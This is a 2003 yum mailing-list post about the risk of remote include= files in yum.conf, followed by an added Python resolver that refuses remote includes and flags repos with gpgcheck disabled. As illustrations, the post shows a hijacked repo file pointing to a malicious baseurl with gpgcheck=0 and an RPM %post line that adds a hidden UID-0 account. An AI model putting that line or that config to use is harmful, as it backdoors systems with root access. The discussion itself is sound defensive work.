[Yum] Security issues with include= implementation in yum.conf

seth vidal skvidal at phy.duke.edu
Sat Oct 4 07:10:43 UTC 2003


> First, includes are recursive. e.g. yum.conf may include a file that
> includes a file that includes a file ad infinitum. And, it is possible
> to include either local files or remote (http/ftp) files. The problem
> here is that it is (currently) possible for a remote file to include any
> other file. When the remote file is managed by the user this isn't a big
> deal but if repositories started providing files for users to include=
> in their yum.conf's, this could lead to security concerns in that the
> remote file can basically set arbitrary values in yum.conf (adding other
> repositories behind the scenes, etc). Or, if a remote file is
> compromised, it could point to some other repository URL without the
> user knowing, which may allow a malicious someone to update almost
> anything (in the absence of gpg).

The first person who suggests gpg signing config files gets beaten. :)

My general take is that this is no big deal - but there is the possibility
for much abuse and much flexibility. Hard call between the two of them.

from a standpoint of flexibility, being able to get parts of your config
file from an arbitrary url is useful and handy - on the other hand,
think of this config file:

[main]
include=http://domain.org/mymain.cgi

include=http://freshrpms.net/default-repo

include=http://fedora.us/default.repo

include=http://joeblows/default.repo

now fedora and freshrpms are trustworthy folks - but joeblow might not
be, or their security might not be good enough, and the default.repo
for joeblows might normally be:

[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://joeblows/rpms/
gpgcheck=1

it could become:

[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://someotherplacew/evil/rpms/
gpgcheck=0


the result could be that someotherplace has taken all of joeblows'
rpms and rebuilt them with:

%post
/usr/sbin/adduser -r -u 0 -p somepass r00t


Clearly anyone can see the implications of that.

include= could give a lot of flexibility in a controlled environment, or
it could allow more boxes to be rooted quickly :)

I just wanted to add a precise example to Ryan's comment.

-sv
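As an added example (not yum's code and not from this thread): a small include resolver in Python that applies the kind of policy the concern above points at. A file that was itself fetched remotely is not allowed to pull in further includes, recursion depth is bounded, include cycles are refused, and any repo section that arrives with gpgcheck set to anything but 1 is reported. The URLs and file contents in SOURCES are constructed for the example.

```python
import re
from urllib.parse import urlparse

REMOTE_SCHEMES = {"http", "https", "ftp"}
MAX_DEPTH = 4
INCLUDE_RE = re.compile(r"^\s*include\s*=\s*(\S+)\s*$", re.IGNORECASE)
SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")

# Constructed sample: include targets mapped to their content, standing in
# for files a real resolver would read from disk or fetch over http/ftp.
SOURCES = {
    "/etc/yum.conf": "[main]\ninclude=http://joeblows/default.repo\n",
    "http://joeblows/default.repo": "[joeblows]\nbaseurl=http://someotherplace/evil/rpms/\n"
                                    "gpgcheck=0\ninclude=http://joeblows/other.repo\n",
}

def resolve(target, sources, depth=0, seen=None):
    """Expand include= lines starting at `target`; returns (lines, findings).
    Policy (this example's, not yum's): a remotely fetched file may not include
    anything, recursion stops at MAX_DEPTH, and include cycles are refused."""
    seen = set() if seen is None else seen
    if target in seen:
        return [], [f"cycle: {target} already included"]
    if depth > MAX_DEPTH:
        return [], [f"depth limit exceeded at {target}"]
    seen.add(target)
    remote = urlparse(target).scheme.lower() in REMOTE_SCHEMES
    lines, findings = [], []
    for line in sources.get(target, "").splitlines():
        m = INCLUDE_RE.match(line)
        if not m:
            lines.append(line)
        elif remote:  # remote content gets no say over what else is included
            findings.append(f"refused: remote {target} tries to include {m.group(1)}")
        else:
            sub_lines, sub_findings = resolve(m.group(1), sources, depth + 1, seen)
            lines += sub_lines
            findings += sub_findings
    return lines, findings

def audit(lines):
    """Return repo sections whose gpgcheck is not 1 (e.g. a swapped default.repo)."""
    section, gpg = None, {}
    for line in lines:
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            gpg[section] = None
        elif section and line.partition("=")[0].strip().lower() == "gpgcheck":
            gpg[section] = line.partition("=")[2].strip()
    return [s for s, v in gpg.items() if s != "main" and v != "1"]
```

Running `resolve("/etc/yum.conf", SOURCES)` and then `audit` on the result reports the joeblows section and refuses the remote file's own include= line.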
